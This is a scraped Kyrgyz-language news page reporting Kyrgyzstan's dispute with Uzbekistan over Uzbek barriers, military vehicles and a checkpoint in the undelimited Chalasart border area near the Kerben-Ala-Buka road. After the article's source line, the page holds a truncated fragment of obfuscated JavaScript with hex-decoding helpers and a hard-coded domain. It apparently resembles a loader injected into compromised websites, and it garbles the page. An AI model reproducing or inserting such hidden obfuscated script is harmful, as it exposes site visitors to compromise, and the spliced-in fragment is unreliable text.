Menu

Ѳзбекстан Кыргызстандын нааразылык нотасына жооп берди

Бөлүшүү:

Кыргызстандын тышкы иштер министрлиги Ѳзбекстан тарап расмий түрдө каршылык нотасына жооп бергенин билдирди. Бирок жооп канааттандырган жок.

«Өзбек тараптын жиберген нотасында такталбаган “Чаласарт” чек ара аймагынан тосмолорду алуу, куралдуу күчтөрүн жана аскердик техникасын чыгаруу боюнча кыргыз тараптын койгон маселелерине жооп берилген эмес. Кыргыз тарап такталбаган “Чаласарт” чек ара аймагына өзбек тарап тосмолорду коюга, куралдуу күчтөрүн жана аскердик техникасын киргизүүгө мүмкүн эместигин дагы бир жолу кайталайт. Ал эми өзбек тараптын кыргыз тарапка жиберген жооп иретиндеги нотасында Өзбекстанда жылына Нооруз майрамын майрамдоо учуруна коопсуздукту жана коомдук тартипти камсыз кылуу максатында мамлекеттик чек араны кайтарууну күчөтүү боюнча тиешелүү иш-чараларды жүргүзүшөт деп билдиришкен. Жогорудагы такталбаган аймактан өзбек тарап өзүнүн тосмолорун, аскер кызматкерлерин жана аскердик техникаларын алып чыккандан кийин Өзбекстан тараптын оң жооп болбогондуктан токтотулган эки тараптын ортосундагы бар механизмдин чегинде кыргыз тарап өзбек коллегалары менен кыргыз-өзбек мамилелериндеги бардык маселелер боюнча конструктивдүү сүйлөшүүлөргө даяр экендигин билдирет. Тиешелүү нота өзбек тарапка жиберилди»,-деп айтылат Кыргызстандын тышкы иштер министрлиги тараткан маалыматта.

Кыргыз-өзбек чек арасындагы кырдаал өзгөрүүсүз калууда. 18-мартта Жалал-Абаддын Аксы районундагы кыргыз-өзбек чек арасынын такталбаган тилкесине Өзбекстан эки БТР жана эки “КамАЗ” киргизип, Кербен-Ала-Бука унаа жолунун жарым чакырым чамалуу тилкесине өзбек чек арачылары блок-пост коюп алган.

Бул окуядан кийин Кыргызстандын тышкы иштер министрлиги Өзбекстандын Кыргызстандагы элчисин чакырып, Кербен-Ала-Бука автожолун өзбек чек арачыларынын тосуп алганына байланыштуу каршылык нотасын тапшырып, жолго коюлган постторду дароо алууну талап кылган.

Бул маселени кыргыз тарап Жамааттык коопсуздук боюнча келишими уюмунун жыйынына алып чыкты.

Бүгүн болсо кыргыз өкмөтү чек ара маселесинде кыргыз тарап да чечкиндүү кадамдарга барарын билдирди. Бул кадамдарды кыргыз өкмөтүнүн чек ара аймактарын өнүктүрүү жана чек араны тактоо боюнча бөлүмүнүн башчысы Курбанбай Искандаров Кыргызстандын чек ара тилкесинде турган обьектилерди өлкө менчигине өтөрүп алуу чечими деп түшүндүрдү.

Булак: bbc.com

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 18 + = 28

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: